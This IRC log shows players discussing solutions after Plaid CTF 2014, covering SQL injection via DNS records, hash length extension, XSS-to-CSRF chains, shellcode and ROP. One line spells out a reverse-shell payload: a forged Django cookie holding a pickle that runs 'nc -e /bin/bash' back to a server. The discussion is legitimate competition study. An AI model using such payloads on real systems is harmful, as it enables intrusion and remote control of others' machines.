<abuss> deject3d, after getting the secrets.py
<abuss> you can forge cookies
LuckyY> phiber__: +1
<abuss> it took me a while to get it to work
<deject3d> yeah i never got my cookies to work
<abuss> cause I didn't notice django had their own b64_decode that tweaked padding
<deject3d> humph
<deject3d> i tried for so long to get a cookie to work
<deject3d> oh well
<abuss> then you assemble a pickle that calls os.system('nc -e /bin/bash/ server port')
== chrissing [~nullProte@pool-71-191-221-210.washdc.fios.verizon.net] has quit [Remote host closed the connection]
abuss> and use the shell to run a program on a file that spits the key
<geobot> sweet, i'm finally getting out about ctf and change it in donald glover, it spits out that some of us are going to open source code for about pony porn warez
<phiber> the mouse cursor doesn't change when hovering over any clickable thing
<deject3d> ah damn
<phiber> so it was really hard to notice the board was interactive
<abuss> agree with phiber, changing the mouse cursor when over something clickable would have been nice
<awesie> phiber abuss: i agree, forgot about that; UX is hard when you are the designer / developer / tester
<+mischa__> whatscat writeups available?
<[CISSP]HoLyVieR> mscha__: check the reset password feature
<[CISSP]HoLyVieR> mischa__: there's a SQLi in there
<Dumpling> sqli via your rdns?
[CISSP]HoLyVieR> no the username
<Sin__> via username
<phiber> I did sqli via rdns records
tsuro> damn, we did it via rdns :)
<tylerni7> rdns was probably easier
<+phiber> much easier than blind sqli on username
<tylerni7> yeah
<+xp45g> via rdns O_o
<mischa__> we had a sqli in our TXT record
<abuss> phiber, huh that's cool
<[CISSP]HoLyVieR> username was a pain to exploit though, 64 characters limit :/
<abuss> which provider lets you screw with rdns like that?
<xp45g> i used username to test one flag char at a time
<abuss> ah
xp45g> if test was successful the query would reset pass for my 2nd account
<KT> btw who is 0xffa?
<== [pwn]Idolf [~idolf@fw-alt2.math.ku.dk] has quit [Ping timeout: 240 seconds]
fester> actually, you just need a rdns to point to a valid dns, it looks up all records of the dns entry (even txt)
<phiber> abuss, your provider usually only lets you change the rdns entry
<mserrano> KT: eindbazen + fail0verflow
<+== ltfish [~Fish@] has quit [Ping timeout: 240 seconds]
phiber> so you point that to a host you control
<== skuu [~thesku@77-57-2-114.dclient.hispeed.ch] has joined #pctf
phiber> and a dns server you control
<KT> mserrano: oh, i see, thx
<Guest17539> is there any writeup for hudak?
inter> looking for solutions to tenement
<iZsh> tylerni7: there is an easier way for curlcore
<== Saxophie [~sophie@ip-83-134-206-91.dsl.scarlet.be] has quit [Quit: WeeChat 0.3.7]
tylerni7> iZsh: how'd you do it?
<+iZsh> tylerni7: you get the sessionID from wireshark, you search for this, and the masterkey is just before that key, then you feed that to wireshark and that's it
<fester> i asked my provider to change my rdns txt entry and they marked my vps as 'High Risk'
<Reinhart> mserrano: we ended up solving it using the slide attack, but also had a brute forcer running that ended up finding the flag while I was sleeping
<ciliated> how to solve doge_stage?
<tylerni7> iZsh: ah, interesting
<+iZsh> tylerni7: that's why it took like a few minutes to solve :)
plaintext> we solved doge by sorting the palette by number of pixels that have that color
<plaintext> and changing the top N to black
<clockish> ciliated: one way is to randomize the palette colors
<+mserrano> Reinhart: hehe
<+plaintext> the key starts appearing
<clockish> plaintext: yep
<+corpille> gimp -> map ;)
<[CISSP]HoLyVieR> at 127 to 208
<mserrano> next time I will make the blocks bigger
<+mserrano> so that that doesn't work
<+ciliated> thanks
<inter> real
<inter> [14:52] <+mserrano> next time I will make the blocks bigger
<D3AdCa7_> I solve doge by divide that image into two...
<mserrano> inter: 3 bytes is not that many bytes
<+inter> you could have 1
<[CISSP]HoLyVieR> change the color of palette from 127 to 208 to black and rest white and it gives the text
<abuss> were there any solutions to halpjs that didn't involve string tricks?
mserrano> abuss: not afaik
<+abuss> more to the point, were there any x besides 1 and 6 such that mystop(x) == x?
<Rinko> a random shuffle on the palette works well though
<abuss> ah
<plaintext> it's impossibru without string tricks
<inter> o
<inter> btw
<plaintext> you need 3 different values map to themselves
<inter> mserrano,
<inter> how did you guys
<abuss> okay that's a bit comforting then :P
<inter> manage to fix the server load
<inter> in the early stage of ctf?
<mserrano> inter: I honestly have no idea
<+inter> im more interested in that
<Reinhart> mserrano: this solved it purely by bruteforce in ~6hrs or so https://p.6core.net/p/hoVp1HHotIIKVpVBTyL1xRJ8
<== bool101 [~bool@c-67-163-29-185.hsd1.in.comcast.net] has quit [Ping timeout: 245 seconds]
mserrano> the relevant people worked magic the way they always do
<+phiber> crypto parlor was hash length extension right?
<== albntomat0 [8c201003@gateway/web/freenode/ip.] has joined #pctf
mserrano> phiber: yes
<+tylerni7> inter: cai_ and awesie worked their magic
<+Tapyroe__> Reinhart: which problem was that for?
<jmgrosen> Dumpling: did you write those write-ups?
<inter> OHH
<phiber> I didn't have enough time to code everything
<Dumpling> jmgrosen: two out of the three
<mserrano> yeah
<+mserrano> there's like some rule of the universe that says that everything must go wrong on friday at 5 pm
<+jmgrosen> Dumpling: could you explain kpop? I don't get how the system() call is getting eval'd
<mserrano> and then magic happens and it eventually gets fixed
<+deject3d> where was the flag for whatscat? was it in the database?
<== Sin__ [~R@] has quit [Ping timeout: 240 seconds]
<+Reinhart> Tapyroe__: wheeee
<phiber> also I got up to $64K playing manually lol
<cai_> inter: awesie will post some notes on that on our blog
<+Dumpling> jmgrosen: preg_replace has a /e flag for dynamic replacements and stuff, it basically evals code
<corpille> what was tenement ?
<robbje> corpille: egghunting shellcode
<jmgrosen> Dumpling: ........wow, that's pretty ridiculous o_O
<Reinhart> Tapyroe__: but as I said, we solved it using the slide attack before this brute forcer finished
* jmgrosen reminds himself never to use php
<abuss> I was going to script parlor to keep betting the farm on 2^20 odds, which would've required 500,000 requests or so
<Tapyroe__> ah right, Reinhart! thanks :) dont think I even tried wheeee
<corpille> egghunting shellcode mmm ... okay :)
<abuss> it was going too slowly, but did anyone else manage that?
<== lkwpeter [~florian@p5DDCCDB7.dip0.t-ipconnect.de] has joined #pctf
deject3d> whatscat was a sql injection but was the flag stored in a file? were file perms on or anything?
[CISSP]HoLyVieR> deject3d: I heard it was in "flag" table
<geobot> his dinner table x|
<xp45g> deject3d: flag was in the db
<iZsh> O.o about https://twitter.com/HacknamStyle/status/455453769824612352
<spq> hm, i didnt know we can still write into /dev/mem (for python jail) solved it completely within python (python function opcodes -> libc system("/bin/sh") )
<abuss> NICE
<Dumpling> spq: got a writeup for that?
<inter> does any of you know solutions to curlcore?
<iZsh> hijacking the support email is a nice way to get hints ;-)
<deject3d> anyone have a brony writeup?
<spq> Dumpling: not ready :D
<Rinko> btw does "hudak" refer to Paul Hudak? closure and lazy evaluation everywhere in this problem
<phiber> I tried replacing function bytecode, but if I replaced it with something that imported os it failed
<mserrano> Rinko: yes.
<+plaintext> yep
<___Sin> iZsh, that's so nasty
<plaintext> we only figured out that hint in the end
<phiber> anyone did it that way?
<mserrano> phiber: we held an import lock
<+plaintext> hudak was a nice task btw
<mserrano> phiber: so you couldn't import anyway
<+inter> phiber: acquire_lock()
<phiber> oh
<inter> but
<inter> does anyone know solutions to curlcore?
<iZsh> inter: yes
<inter> iZsh: may i pm you :D
<mserrano> inter: find the aes keys, decrypt the traffic, get flag
<+inter> well
<iZsh> mserrano: easier way :)
<inter> i looked for
<inter> temporary ssl keys
<inter> in corefile
<phiber> I also thought about writing to /self/mem but I was too busy on other challenges
== ciliated [99bd4541@gateway/web/freenode/ip.] has quit [Quit: Page closed]
== phreeek [~magnus@adversec.com] has joined #pctf
<inter> but i didnt find any patterns
<inter> what were the methods to find the aes key in the corefile?
<phiber> there were too many challenges
<iZsh> inter: you can open it in wireshark, look at the SessionID, search for it in a hex editor in the dump, just before that, you'll have the size of the sessionid, and then before that, the masterkey
<geobot> and the masterkey is just before
<inter> open corefile?
<phreeek> mserrano: one question to kpop, I got only a 500 error with your payload
<inter> oh
<inter> nvm
<inter> OHH
<inter> okay
<iZsh> inter: then you write a file called key.txt which contains the sessionid and the masterkey and you can feed that to wireshark for decryption
<inter> wow
<inter> damn
<inter> it feels like a hammer just slammed my face to the floor
<inter> thanks iZsh :D
<iZsh> that one was fast to solve :)
<inter> well
<inter> my brain was already tortured by misc250 and pyjail
<inter> n0sleep.tv
<plaintext> damn, who handles the Plaid twitter acc?
<plaintext> i made a mistake with my writeup :8
<foundation> http://pastebin.com/3Kw2HZjP patch for tor for rendezvous
<inter> yeah
<inter> i knew
<inter> what i wanted to do
<inter> but i couldnt find the function get_node_by_name or something
<inter> i tried hardcoding to fill out the structs
<inter> but i failed LOL
<dwn> how were we supposed to guess there was a flags table in whatscat ;_;
<foundation> took a while
<dwn> also that box has the slowest updating dns cache
<inter> at least i learned 2 things today
<inter> 1. dont eat overnight chinese food
<NK_> tylerni7 / cai_ well done, it was great
<NK_> :)
<inter> 2. buy ida
<Adran> 1. seems like poor life choice
<inter> well
<chuckleberry> foundation: nice!
<inter> some of the ppps
<inter> ate overnight chinese food
<inter> so i decided to do that as well
<Adran> is that why we had a massive netsplit?!
<inter> and as it turned out i like overnight pho better
<Adran> the servers ate old Chinese food?
== chrissing [~nullProte@pool-71-191-221-210.washdc.fios.verizon.net] has joined #pctf
<robbje> want zfs writeup
<phiber> dwn, custom dns server with twisted and ttl=0 FTW
<jix> foundation: I gave up following this async spaghetti mess
<dwn> phiber: how do you set that up
<sven> "see suspicious file name, figure out it's two files XOR'ed together, find out a suspicious block just before the file name, xor that with whole file, strings. profit"<-- how aDR4eA solved zfs :)
<sven> robbje: ^--
<Adran> phiber: what did you use that for?
<jix> foundation: instead I patched the bandwidth + weight calculation
<dwn> would like to see a writeup on that, lol, phiber
<jix> foundation: to make chandler the #1 candidate for everything
<phiber> Adran, whatscat
<upb> < dwn> how were we supposed to guess there was a flags table in whatscat ;_; <- haha, i gave up on that as well, thought about reading out information_schema.tables but php munges . in txt record value for some reason
<plaintext> who is in charge of the plaid twitter?
<inter> cai_: when i ran into obstacles i listened to this
<Adran> phiber: got a writeup?
<_blasty_> ricky: tylerni7: mserrano: how much longer is bronies going to be up ?
<inter> it magically calmed me down lul
<_blasty_> I wanna refine some stuff in the AM
<_blasty_> not fucking now, though
<tylerni7> plaintext: most of us have control of it
<+deject3d> anyone have strategies on solving brony? i don't really understand how attacking the internal target was supposed to work
<inter> brony?
<_blasty_> deject3d: XSS
<inter> i know 2nd part
<inter> deals with shit ton of stuff
<robbje> sven: xor. ...
<deject3d> yeah but the xss wasn't the attack on the actual target
<foundation> btw, about brony, what was the first part, i did get the PHPSESSIONID , what then ?
<dwn> _blasty_: the fuck did you use xss to do though
<deject3d> i want to know how we were supposed to use the xss to attack the internal panel
<_blasty_> deject3d: so using the XSS in the ponies website you can execute a CSRF POST against the login form of the portal page
<nurfed_> xss->csrf->exploit leak->xss->csrf->exploit->/bin/bash
<_blasty_> if you feed the portal page more than N chars in the OTP field it will segfault
<_blasty_> if you keep feeding it chars it will trigger the "stack smashing detected" message
<_blasty_> the "stack smashing detected" message has the progname in it
<foundation> ooooo....
<foundation> niceeee
<_blasty_> like STACK SMASHING DETECTED: ./checkotp terminated
<deject3d> what is the point of the csrf? we could already see the 'internal' login page, right? or am i misinformed
<dwn> _blasty_: what values did you post to the login form though?
<_blasty_> but the pointer to that argv0 checkotp string could be overwritten
<_blasty_> so get your own input in the output again
<_blasty_> then you basically elevate XSS privileges to that domain
== albntomat0 [8c201003@gateway/web/freenode/ip.] has quit [Quit: Page closed]
<_blasty_> from where you can leak the admin cookie
<_blasty_> we'll do a proper writeup
<phiber> dwn, Adran https://privatepaste.com/6413fc0aca
<_blasty_> this explanation sucks
<_blasty_> part#2 is even cooler
<deject3d> would appreciate it
<deject3d> i tried using beef framework to start some attacks against the internal site but owell
<inter> well
<dwn> wow, you actually wrote your own dns server phiber. amazing.
<inter> now i can go do my kush
<inter> happily
<inter> lul
<_blasty_> I also "wrote" my "own" DNS server for whatscat, using some perl module :-P
<inter> now that i figured out the stuff that i couldnt do :D
<_blasty_> Net::DNS::Server or something
<_blasty_> yay perl.
<plaintext> we did whatscat with blind sqli
<tylerni7> dinner time for PPP
<+tylerni7> we'll be back online laterz
<+_blasty_> we did whatscat by updating the email field in the DB
== xire_ [~marco@adsl-ull-93-153.49-151.net24.it] has quit [Quit: Lost terminal]
<plaintext> tylerni7, I sent you a message :)
<Adran> phiber: ugh, inject was dns
<dwn> how did you all do tenement?
<_blasty_> then requesting the reset page again for that user to leak back the value we inserted into the email field
<Adran> didn't think about that. thanks
<dwn> it was 100pts so it must've been incredibly easy
<dwn> but the seccomp
<foundation> dwn: no need for the shell, just egghunt for PPPP in memory
<pctf_scoreboard> o/
<Adran> the scoreboard is speaking!
<dwn> was PPPP in a static location
<foundation> dwn: + nice trick -> write() doesn't segfault when you write to invalid page , so you can use that to dump the whole process memory
<dwn> oh, neat
<dwn> thanks will remember that
<foundation> it was in some mmaped region , but we didn't know where
<deject3d> was there a trick to solving polygonshifter web100
<plaintext> just blind sqli
<plaintext> nothing extra
<foundation> afaik bsqli
<deject3d> wait, it was a sqli
<deject3d> oh god damnit
<plaintext> i guess I will make a quick writeup on that too
<Tapyroe__> !! -.-
<pd7> plaintext: are your writeups online yet?
<plaintext> pd7: i made one on halphow2js
<Tapyroe__> sitting here thinking about all the problems i could've solved haha....
<dwn> was there some neat way to evaluate all the templates in G++ for you
<nurfed_> web100 was stupid :/
<geobot> on web100 chicken
<Tapyroe__> or rather, should've been able to solve haah
<dwn> because we just worked G++ out on paper
<D3AdCa7_> Can polygonshifter be solved by the union way?
<plaintext> plaid retweeted it but I removed that tweet dammit, because there was a typo :P
<deject3d> i took the problem description at face value and tried to actually brute force the login
<plaintext> and now it's not retweeted, no fame :(
<D3AdCa7_> My bsqli script runs so slow
<foundation> dwn: apparently you needed to figure out that it's actually just doing matrix multiplication over galois field 257 ...
<pcc7> a writeup for pyjail?.
<deject3d> the html comment "admin / ???????" made me think it was actually a 7 char password. "polygon" and "shifter" are both 7 chars each, so i wrote a script to try every combination involving case
<deject3d> WHAT A WASTE
== Stean [~Stean@hlab.informatik.uni-mannheim.de] has joined #pctf
<D3AdCa7_> u r so cute.. deject3d :)
<plaintext> it wasn't misc 10 though :P
<iZsh> how did you guys solve tenement? because it took me forever and some ppl solved it quickly, so i'm wondering if i missed an easier way
<dwn> plaintext: link to your how2js writeup?
<dwn> iZsh: 18:14 < foundation> dwn: + nice trick -> write() doesn't segfault when you write to invalid page , so you can use that to dump the whole process memory
<cimmi_> what was actually the answer to the math is hard?
<mathiasbynens> plaintext: in your how2js writeup, “The keys cannot be in increasing order” → wut?
<plaintext> mathiasbynens: is that a mistake?
<plaintext> let me check
<foundation> iZsh: took a while to figure out how not to segfault on invalid pages
<plaintext> oh right, lol
<plaintext> i'm dumb
<D3AdCa7_> a script for web100 https://gist.github.com/D3AdCa7/10604720
<foundation> cimmi_: 100000
<plaintext> I'll add a clarification
== Bono [1b7f597e@gateway/web/freenode/ip.] has joined #pctf
<mathiasbynens> plaintext: https://github.com/ctfs/write-ups/tree/master/plaid-ctf-2014/halphow2js#readme they’re sorted lexicographically
<iZsh> dwn: what did you write? i'm not sure i follow, but i dont remember exactly the whole thing :)
<mathiasbynens> but you knew that
<foundation> cimmi_: google excel 65000 100000 for clarification
<plaintext> yeah, brainfart
<mathiasbynens> plaintext: i'll add a link to your write-up, let me know if you write more!
== naehrwert [~naehrwert@84-72-164-134.dclient.hispeed.ch] has joined #pctf
<plaintext> thanks :)
<plaintext> I'll do one on polygon I guess
<cimmi_> yea I actually did read it when I tried to find the answer
<dwn> iZsh: tenement basically just executed your buffer but there was seccomp so you're not going to read the file or get shell. I wasn't able to get around this because I couldn't figure out how to find the flag in memory. foundation just dumped the whole memory.
<skuu> plaintext: did you mention hudak? if so; remember the flag so I can check where I went wrong?
<iZsh> dwn: we solved it completely differently, we called malloc(16) and had some smart filtering to recognize the proper pointers to follow
<cimmi_> I submitted 10k and not 100k when looking at that one. stupid
<|x_x|> http://csrc.tamuc.edu/css/?p=156 Lazy man's doge_stege writeup
<foundation> iZsh: we just wrote egghunt shellcode that traversed the memory , the trick was to see which addresses were actually mapped , using write() you can check if the address is valid or not
<plaintext> i think I have the hudak flag
<iZsh> foundation: oh i see
<plaintext> skuu: 4t_l34st_it_was_1mperat1v3...
<skuu> oh wow, thanks
<iZsh> well, we did it the complicated way ;-)
<|x_x|> http://csrc.tamuc.edu/css/?p=152 Sanity Check, Heartbleed, and Multiplication is Hard as well. ya know, in case ya had problems with Sanity Check.
<skuu> soo close
<abuss> cimmi_, ouch; why wouldn't you just submit 100000? :P
== zzoru [6e23254c@gateway/web/freenode/ip.] has quit [Ping timeout: 240 seconds]
<abuss> sanity check was a really hard web problem
<iZsh> foundation, dwn : So libjansson has a reference-count based object system, and when a successful address has been found from the json array, it free()'s both the json integer object and the json array containing the same integer, so when dumping all the free()'d objects (by malloc'ing 16 bytes and dumping the contents), you'll see the reference count of 0 for a lot of objects, and reference count -1 for the chosen address.
<iZsh> Then &0xfffff000 it and dump the buffer, and you get the flag;
<abuss> <f5><f5><f5><f5><f5> ooh a flag - submit? no it timed out <f5> <f5> <f5> <f5> <f5>
<cimmi_> abuss: who knows? atleast not me
<abuss> "Logged in as Samurai, abort!"
<dwn> nice iZsh
<iZsh> the write() trick is nice :)
<iZsh> much easier
<spq> admins: what was wrong with the scoreboard being unreachable from some places in the first hours?
<iZsh> i spent hours and hours on tenement
<dwn> yeah for only 100pts
<dwn> ;_;
<iZsh> i wonder how we were supposed to solve it
<iZsh> if they expected 100pt
<geobot> only 100pt for a bit, or a school/work day - in pm about rarverseme?
<iZsh> tylerni7: what was the expected way?
<mathiasbynens> iZsh: https://github.com/ctfs/write-ups/tree/master/plaid-ctf-2014/tenement#readme dump the whole memory then run strings
== Mawekl [~chatzilla@aajb235.neoplus.adsl.tpnet.pl] has quit [Quit: lulu]
<dwn> all these todo writeups mathiasbynens, lol
<iZsh> mathiasbynens: lol
<iZsh> mathiasbynens: that could be summarized as "get the flag"
<mathiasbynens> dwn: yeah the point is for people to help ;)
<mathiasbynens> iZsh: inorite
<dwn> this hash length extension thing is the most obscure web thing ever. i love it
<dwn> ppp: will the challenge sources be released? or some way for us to run them ourselves to try to complete them?
<iZsh> well hash length extension is a classic
<dwn> is it? I've been ctfing for about a year and don't remember seeing it
<iZsh> it's not the first time i see one, but can't recall where
<upb> yeah but how the hell was it supposed to be guessed that the serialized string is reversed before hashing?
<iZsh> anyway, i'm off
<phiber> upb, get admin.php source
<|x_x|> Which could be obtained by feeding admin.php through the ?page= variable.
<Digihash> Goodbye, thank you guys for the great CTF
<dwn> upb: you could get the source
<grollicus_> did you ever sql inject via dns records? that challenge was especially funny because there seems to be some vuln in the management software of the first domain we tried to use
<dwn> grollicus_: I actually encountered the same thing
<upb> HAH
<dwn> reported it
<phiber> I could have solved parlor in time if python/pypy wasn't so slow
<poppopret> my mtgox web 150 writeup
<spq> how did you solve harry potter?
<phiber> tylerni7, you could have given more bits of the md5 :/
<sven> or you could've written your brute forcer in c :P
<chuckleberry> huh, of all of the challenges most people think mtgox needed a writeup?
<phiber> I didn't have enough time for that
<phiber> there were like 10min left when I had the attack implemented
<chuckleberry> life's hard
<sven> we ran out of time to solve moscow too - it happens :)
<foundation> 4st _l34t t1mpera _wa _it_ at_ as_1v3... << damn , so close
<chuckleberry> poppopret: i didn't even get a mention!
<chuckleberry> bad form
<poppopret> huh?
<chuckleberry> remember, you pmd me
<spq> regarding harry potter: i really had problems finding gadgets, made it with very weird add [rbx-something], cl; cl was horrible to control - when i had that, i patched one got entry to point to system and then did a dereferencing call to that entry
<chuckleberry> asked me for help...
<poppopret> ok how would you like to be credited :)
<foundation> spq: same here afaik
<chuckleberry> i was joking
<poppopret> hahah ok
<spq> foundation: how did you control cl? the add cl, cl + dec cl ?
<naehrwert> spq, writing byte by byte using mov [rax], bl @ 401798
<spq> naehrwert: well i had writing byte by byte working but didnt know what to do
<skuu> spq: foundation: we didn't use system(), we used vsyscalls execve
<plaintext> how did you guys solve sass btw?
<plaintext> we thought about jumping to read to cause one more buffer overflow, but it was too late
<_blasty_> hey naehrwert , you were also playing ?
<spq> skuu: which vsyscalls?
<spq> the stuff in 0xfffff... ?
<skuu> yep
<spq> damn
<naehrwert> hi _blasty_ :) yup with skuu and foundation and some other nice guys
<_blasty_> cool :)
<_blasty_> what team? Binary bandits?
<naehrwert> gn00bz
<_blasty_> ah, right
<spq> tried that, didnt work on my machine, detected unaligned jump into the page
<skuu> yup, ubuntu and what not catches it
<skuu> but works on debian :D
<spq> damn
<skuu> 3.2 kernel ish
<spq> that would have meant 1-2hrs less :)
<spq> but was interesting how one can control a register with such obscure gadgets :)
<plaintext> anyone who solved sass?
<naehrwert> so for parlor, is that '+' meant as concat. or addition?
<phiber> haha
<Galactic> dwn: RuCTF had a hash length extension attack.
<naehrwert> I tried like every possible combo but could never reproduce server output -.-
<phiber> I also got stuck there and had to ask about it
<sven> int(md5(servernonce.decode("hex") + clientnonce + "\n").hexdigest(), 0x10)
<alexwebr> Read all the scrollback, didn't see TL;DR for freya. Looked like MS-KKDPC, said FTS after reading krb5 ASN.1 from RFC. Anybody get it?
<sven> i got it
<sven> it was annoying as fuck :)
<naehrwert> I'm pretty sure that was one way I tried it too, hmm :D
<sven> alexwebr: you need to grab the http branch from https://github.com/nalind/krb5/compare/http
<sven> and then change around /etc/krb5.conf until you can finally kinit ppp and then ssh ppp@shell.woo.pctf
<alexwebr> sven: cool, and "shellpls" was actually the password?
<sven> for the kerberos login, yeah
<sven> (the kinit ppp part)
<alexwebr> sven: Cool. I was expecting I'd have to write a proxy thing myself. Cool that there's code already. Thanks :-)
<sven> yeah, i started writing my own proxy when i googled for some magic constant and found that git :-)
<sven> when i saw frozencemetery was the author of that patch i knew i was looking in the right direction ;)
<alexwebr> Haha
<sven> and then i failed for 3 hours because ssh was linked against some wrong version of the library \o/
<|x_x|> http://csrc.tamuc.edu/css/?p=169 Twenty Writeup
<cimmi_> any parlor writeups?
== jmgrosen [~jmgrosen@ip68-227-85-44.sb.sd.cox.net] has quit [Quit: jmgrosen]
<plaintext> i guess everyone is sleeping right now
<|x_x|> Sleeping or realizing they just spent a weekend eating cold pizza and hacking instead of doing Calculus III homework that is due tomorrow.
<plaintext> lol I do have an assignment due tomorrow
<plaintext> crap
<rray> assignment + essay ;_;
<tokki> fak i wanted to log the whole channel
<tokki> but this webirc killed it
<tokki> any angel who wants to paste it on pastebin <3
<deject3d> i get to learn haskell tonight, yay procrastination
<plaintext> deject3d: did you solve hudak?
<chuckleberry> i need to learn why i'm so fucking bad at ctfs and how to fix that
<deject3d> no, but i just went through my professors slides and literally saw the hudak name
<deject3d> and was like "oh must have been a haskell challenge"
<plaintext> well it was, kinda, sorta
<dwn> |x_x|: due tomorrow? wow, how nice. mine is midnight tonight ;_;
<plaintext> dwn: what timezone?
<Adran> tokki: sure
== poppopret [~poppopret@c-67-169-180-57.hsd1.ca.comcast.net] has quit [Ping timeout: 258 seconds]
<dwn> plaintext: EST
<|x_x|> dwn: Mine is due at noon tomorrow.
<dwn> just need to pwn this submission server and i'll be set
<|x_x|> tokki: http://paste2.org/IIcALYLX
<plaintext> damn, CTFs are unhealthy
<Adran> tokki: http://pastebin.com/tpeyNqJH
<plaintext> 48 hours of sitting, barely eating and sleeping
<Adran> looks like |x_x| beat me to it
<Xor0X> totally worth it though
<plaintext> yep
<azet> ohai
<azet> any writeups online yet? (rsa, parlor, wheee)?
<|x_x|> I may not have ranked in the top 10 spots, but at least I made it in the top 14%. That's close enough. >_>
